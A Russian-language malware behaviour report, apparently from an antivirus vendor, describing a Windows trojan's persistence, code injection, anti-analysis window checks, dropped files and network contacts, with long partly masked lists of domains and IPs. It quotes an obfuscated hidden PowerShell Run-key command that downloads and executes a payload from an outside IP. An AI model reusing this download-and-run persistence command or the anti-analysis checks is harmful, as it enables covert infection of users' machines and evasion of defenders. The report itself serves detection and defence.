Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Sound device' = 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nt...
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\firefox default browser agent 47c7bf34d9439911
- %APPDATA%\microsoft\windows\start menu\programs\startup\svchostsw.exe
Вредоносные функции
Загружает и запускает на исполнение
- (http://19#.#6.146.55/ru+nti+m+ebr+oke+r.exe
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- iwjrsev
Ищет следующие окна с целью
обнаружения утилит для анализа:
- ClassName: 'RegmonClass', WindowName: ''
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\iwjrsev
- %APPDATA%\ehthswd
- %TEMP%\e1b7.exe
- %TEMP%\e8c9.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- %TEMP%\fd25.exe
- %TEMP%\s.bat
- %TEMP%\3d12.exe
- %TEMP%\51db.exe
- %TEMP%\fd25.exe.pid
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\iwjrsev
- %APPDATA%\ehthswd
Самоудаляется.
Сетевая активность
Подключается к
- '91.##1.19.52':80
- 'ha##law.ir':443
- 'vi####adierna.es':443
- 'ya###ite.com':443
- 'th#####chilltree.co.uk':443
- 'do###borne.com':443
- 'ha#k.co':443
- 'ga####urner.life':443
- 'ge###tapes.com':443
- 'na#####icledonation.org':80
- 'pr######tipicimonteisola.it':443
- 'au###idens.com':443
- 'ek#a.ee':443
- 'pe#######llsdentalcentre.com.au':443
- 'lo####festatus.com':443
- 'tr##ly.com':443
- 'at###er-m.paris':443
- 'st####anatlanta.com':443
- 'ci###elpmg.com':80
- 'di##.org.tr':80
- 'ho####uthinlove.org':443
- 'fa######ndsamphitheatre.com':80
- 'su####volreizen.nl':443
- 'st####rbolivia.com':443
- 'in######ionalrfpsearch.com':443
- 'ec######igitalagency.com':443
- 'ch####ng-oil.com':443
- 'to####rchive.com':443
- 'bi##ack.ru':80
- 'st######ntheaterohio.com':80
- 'bs###ryou.com':443
- 'zo###ccupee.com':80
- 'st#####ntertainment.com':443
- 'an###odieta.com':443
- 're###l.com.mx':443
- 'la####esenegal.com':443
- 'na###nalis.my':443
- 'ce######oastdivecenter.com':80
- 'hy####icsecrets.com':443
- 'at###er-m.paris':80
- 'al##int.by':443
- 're###ibra.com':443
- 'ab###ress.co.il':80
- 'gi##ng.nl':443
- 'ha###soru.com':443
- 'de###.com.au':80
- 'ju#####ganmusic.com.au':443
- 'su####hanimlar.org':443
- 'al######epairparklandfl.com':80
- 'fr###exual.com':443
- 'ro#####ushseduction.com':80
- 'sn#####rdthemidwest.com':80
- 'ri######telacolombina.it':443
- 'ho###mpact.com':80
- 'pe###et.com.tr':443
- 'br####trading.net':443
- 'gl##t.info':80
- 'ka###-kayak.com':443
- 'do#####niowacity.com':443
- 'wo####nerehab.com':80
- 'an#####mainville.com':443
- 'th####ictouch.co.uk':443
- 'mo#####t-konstruktor.su':443
- 'bi#####larscongress.com':80
- 'ex#####ncelongbeach.net':443
- 'sy####credit.com':443
- 'co#####shop-coffee.com':443
- 'au####testar.com':443
- 'al###ncibo.com':80
- 'mo##part.ro':443
- 'de###oncoach.nl':443
- 'na###ise.com':443
- 'sa####thanjali.com':80
- 'ad######electronique.com':443
- 'ec##z.org':443
- 'to####ecabins.co.uk':443
- '19#.#6.146.22':47861
- '18#.#91.34.170':8888
- '19#.#6.146.55':80
- 'su###made.com':443
- 'ho###sabo.it':443
- 'do###rvet.it':443
- 'st#####reresources.com':443
- 'va#####nrental.co.jp':80
- 'bu#####aszibolcsode.hu':80
- 'cp##me.info':80
- 'fr##i.com':443
- 'ga##son.com':80
- 'to####mtheories.org':80
- 'jo###cks.com':443
- 'fr####location.com':80
- 'ab####dvisor.com':443
- 'pi#####tqualityair.com':80
- 'ff###imale.fr':443
- 'bo###ab.health':443
- 'je###ronics.be':443
- 'wi###rancis.com':443
- 'pd###skvard.se':443
- 'ro####trailers.com':443
- 're###boat.si':443
- 'zb#i.ru':80
- 'pl#####electronix.com':80
- 'do###dtom.com':443
- 'br####r-berlin.de':443
- 're####a-baumann.com':80
- 'pa####mosslaw.com':80
- 'oa####dfinance.com':443
- 'ac####tethought.com':80
- 'pr#####ionefinanza.com':443
TCP
Запросы HTTP GET
- http://re#####listforjuly2.xyz/reestr.exe
- http://18#.##1.34.170:8888/bots/chkVersion?cu#################### via 18#.#91.34.170
- http://18#.##1.34.170:8888/project/active via 18#.#91.34.170
- http://18#.##1.34.170:8888/gw?wo########## via 18#.#91.34.170
- http://18#.##1.34.170:8888/gw?wo##### via 18#.#91.34.170
- http://www.fr####location.com/wp-login.php
Запросы HTTP POST
- http://re#####listforjuly2.xyz/
- http://www.fr####location.com/wp-login.php
- http://19#.##.146.22:47861/ via 19#.#6.146.22
Другие
- 'na###ise.com':443
- 'vi####adierna.es':443
- 'pe#######llsdentalcentre.com.au':443
- 'ha##law.ir':443
- 'ch####ng-oil.com':443
- 'jo###cks.com':443
- 'de###oncoach.nl':443
- 'st####rbolivia.com':443
- 'ex#####ncelongbeach.net':443
- 'ad######electronique.com':443
- 'to####ecabins.co.uk':443
- 'su####hanimlar.org':443
- 'ec##z.org':443
- 'mo##part.ro':443
- 'do#####niowacity.com':443
- 'st#####reresources.com':443
- 'tr##ly.com':443
- 'sh####eviews.com':443
- 'hy####icsecrets.com':443
- 'na###nalis.my':443
- 'la####esenegal.com':443
- 're###l.com.mx':443
- 'an###odieta.com':443
- 'al##int.by':443
- 'gi##ng.nl':443
- 're###ibra.com':443
- 'ha###soru.com':443
- 'ju#####ganmusic.com.au':443
- 'au###idens.com':443
- 'ec######igitalagency.com':443
- 'ya###ite.com':443
- 'fr##i.com':443
- 'st#####ntertainment.com':443
- 'ho####uthinlove.org':443
- 'do###borne.com':443
- 'th#####chilltree.co.uk':443
- 'co#####shop-coffee.com':443
- 'sy####credit.com':443
- 'th####ictouch.co.uk':443
- 'mo#####t-konstruktor.su':443
- 'au####testar.com':443
- 'an#####mainville.com':443
- 'br####trading.net':443
- 'su###made.com':443
- 'ka###-kayak.com':443
- 'oa####dfinance.com':443
- 'do###rvet.it':443
- 'ho###sabo.it':443
- 'do###dtom.com':443
- 'br####r-berlin.de':443
- 'pe###et.com.tr':443
- 'bo###ab.health':443
- 'wi###rancis.com':443
- 'ek#a.ee':443
- 'ge###tapes.com':443
- 'ga####urner.life':443
- 'to####rchive.com':443
- 'in######ionalrfpsearch.com':443
- 'st####anatlanta.com':443
- 'fr####location.com':443
- 'pr######tipicimonteisola.it':443
- 'su####volreizen.nl':443
- 'ro####trailers.com':443
- 're###boat.si':443
- 'ff###imale.fr':443
- 'ab####dvisor.com':443
- 'je###ronics.be':443
- 'ha#k.co':443
- 'bs###ryou.com':443
UDP
- DNS ASK re#####listforjuly1.xyz
- DNS ASK ha#k.co
- DNS ASK mo####ghmusic.com
- DNS ASK in######ionalrfpsearch.com
- DNS ASK ce#####rogranada24h.es
- DNS ASK th#####chilltree.co.uk
- DNS ASK cm####cruitment.com
- DNS ASK su####hanimlar.org
- DNS ASK mi#####armbloods.co.uk
- DNS ASK ac###estling.de
- DNS ASK ch####ng-oil.com
- DNS ASK ya###ite.com
- DNS ASK vi####adierna.es
- DNS ASK st#####ntertainment.com
- DNS ASK fl###nceawc.com
- DNS ASK ha##law.ir
- DNS ASK ec######igitalagency.com
- DNS ASK to####rchive.com
- DNS ASK ne#####ehudihaifa.co.il
- DNS ASK fa###ring1.se
- DNS ASK ge###tapes.com
- DNS ASK mi##rd.be
- DNS ASK ga####urner.life
- DNS ASK st####anatlanta.com
- DNS ASK fa######ndsamphitheatre.com
- DNS ASK lo####atsalides.com
- DNS ASK ho####uthinlove.org
- DNS ASK as###aura.com
- DNS ASK di##.org.tr
- DNS ASK ci###elpmg.com
- DNS ASK he###ron.com
- DNS ASK te##.#bcyourself.nl
- DNS ASK at###er-m.paris
- DNS ASK pe#######llsdentalcentre.com.au
- DNS ASK tr##ly.com
- DNS ASK au###idens.com
- DNS ASK lo####festatus.com
- DNS ASK ek#a.ee
- DNS ASK do###borne.com
- DNS ASK ap####iatra.com.br
- DNS ASK pr######tipicimonteisola.it
- DNS ASK na#####icledonation.org
- DNS ASK sn#####rdthemidwest.com
- DNS ASK ro#####ushseduction.com
- DNS ASK he#######gymnasticscolumbus.com
- DNS ASK al######epairparklandfl.com
- DNS ASK va####ecwhite.com
- DNS ASK ce######oastdivecenter.com
- DNS ASK la####esenegal.com
- DNS ASK ed###ndy.com
- DNS ASK st###ntafe.com
- DNS ASK lo###nzen.nl
- DNS ASK ma####lambest.com
- DNS ASK an###odieta.com
- DNS ASK re###l.com.mx
- DNS ASK pr#####ionefinanza.com
- DNS ASK st######ntheaterohio.com
- DNS ASK ho###aotizi.com
- DNS ASK vi###antcs.com
- DNS ASK bi##ack.ru
- DNS ASK ri######telacolombina.it
- DNS ASK t-##ne.net
- DNS ASK co######acerestaurant.com
- DNS ASK bs###ryou.com
- DNS ASK zo###ccupee.com
- DNS ASK al##int.by
- DNS ASK na###nalis.my
- DNS ASK re###ibra.com
- DNS ASK fr###exual.com
- DNS ASK mi####aftinfo.de
- DNS ASK co###rhci.org
- DNS ASK st####ipeseller.com
- DNS ASK bu#####eriaorganica.com
- DNS ASK ho###circeo.it
- DNS ASK mi#####science.com.tr
- DNS ASK dr##il.com
- DNS ASK te###quercus.it
- DNS ASK re####vebank.com
- DNS ASK co#####0mgtablet.net
- DNS ASK de###.com.au
- DNS ASK st###enko.net
- DNS ASK ha###soru.com
- DNS ASK ti###ost.com
- DNS ASK hy####icsecrets.com
- DNS ASK gi##ng.nl
- DNS ASK ab###ress.co.il
- DNS ASK me#####tertainment.ca
- DNS ASK su####volreizen.nl
- DNS ASK th###mat.com
- DNS ASK de######e-villetaneuse.fr
- DNS ASK do###dtom.com
- DNS ASK an#####mainville.com
- DNS ASK wo####nerehab.com
- DNS ASK do#####niowacity.com
- DNS ASK ka###-kayak.com
- DNS ASK gl##t.info
- DNS ASK dr#####lhlengani.co.za
- DNS ASK ho###sabo.it
- DNS ASK bi#####larscongress.com
- DNS ASK th####ictouch.co.uk
- DNS ASK do###rvet.it
- DNS ASK re###boat.si
- DNS ASK re####a-baumann.com
- DNS ASK ji###eks.org
- DNS ASK br####r-berlin.de
- DNS ASK pr###nsa.com
- DNS ASK zb#i.ru
- DNS ASK ro####trailers.com
- DNS ASK st#####reresources.com
- DNS ASK oa####dfinance.com
- DNS ASK su###made.com
- DNS ASK sh####eviews.com
- DNS ASK mo#####t-konstruktor.su
- DNS ASK ec##z.org
- DNS ASK la###florene.it
- DNS ASK sa####thanjali.com
- DNS ASK na###ise.com
- DNS ASK ed#####raulino.com.br
- DNS ASK to####ecabins.co.uk
- DNS ASK ad######electronique.com
- DNS ASK mo##part.ro
- DNS ASK re#####listforjuly2.xyz
- DNS ASK de###oncoach.nl
- DNS ASK au####testar.com
- DNS ASK ex#####ncelongbeach.net
- DNS ASK co#####shop-coffee.com
- DNS ASK pe######countynevada.com
- DNS ASK sy####credit.com
- DNS ASK sa####united.com
- DNS ASK pa####mosslaw.com
- DNS ASK du##ot.com
- DNS ASK al###ncibo.com
- DNS ASK pl#####electronix.com
- DNS ASK pd###skvard.se
- DNS ASK go#####vereign-price.eu
- DNS ASK va#####nrental.co.jp
- DNS ASK pr###cyou.nl
- DNS ASK sw###group.com
- DNS ASK br####trading.net
- DNS ASK da#####tection.science
- DNS ASK bi####country.com
- DNS ASK mo####leonelle.com
- DNS ASK pu##h.pt
- DNS ASK ac####tethought.com
- DNS ASK st####utherland.ca
- DNS ASK ju#####ganmusic.com.au
- DNS ASK sh####nkshukla.com
- DNS ASK pe###et.com.tr
- DNS ASK pa#######larochellecentre.fr
- DNS ASK dv###vanis.gr
- DNS ASK ho###terate.pe
- DNS ASK ho###mpact.com
- DNS ASK so#######stoirecowansville.com
- DNS ASK lo####rojekti.fi
- DNS ASK ho###name.co.uk
- DNS ASK ma###alud.com
- DNS ASK fa###oint.com
- DNS ASK ms##by.com
- DNS ASK wi###rancis.com
- DNS ASK bo###ab.health
- DNS ASK cp##me.info
- DNS ASK ff###imale.fr
- DNS ASK ky###style.com
- DNS ASK je###ronics.be
- DNS ASK me####essources.com
- DNS ASK pi#####tqualityair.com
- DNS ASK eb###arithm.com
- DNS ASK ab####dvisor.com
- DNS ASK jo###cks.com
- DNS ASK ga##son.com
- DNS ASK fr##i.com
- DNS ASK to####mtheories.org
- DNS ASK ar####rleston.com
- DNS ASK bu#####aszibolcsode.hu
- DNS ASK ka##lit.com
- DNS ASK ea###rnahsn.org
- DNS ASK fr####location.com
- DNS ASK st####rbolivia.com
- DNS ASK mi##vsky.ru
Другое
Ищет следующие окна
- ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: '18467-41' WindowName: ''
- ClassName: 'File Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: 'Process Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\iwjrsev'
- '%TEMP%\e1b7.exe'
- '%TEMP%\e8c9.exe'
- '%ALLUSERSPROFILE%\runtimebroker.exe'
- '%TEMP%\fd25.exe'
- '%TEMP%\3d12.exe'
- '%TEMP%\51db.exe'
- '%APPDATA%\iwjrsev' ' (со скрытым окном)
- '%ALLUSERSPROFILE%\runtimebroker.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /Q /C %LOCALAPPDATA%\Temp/s.bat' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\taskeng.exe' {86989229-16BF-4697-815B-FC439C67F2CA} S-1-5-21-1960123792-2022915161-3775307078-1001:cmrpwcauo\user:Interactive:[1]
- '%WINDIR%\syswow64\cmd.exe' /Q /C %LOCALAPPDATA%\Temp/s.bat
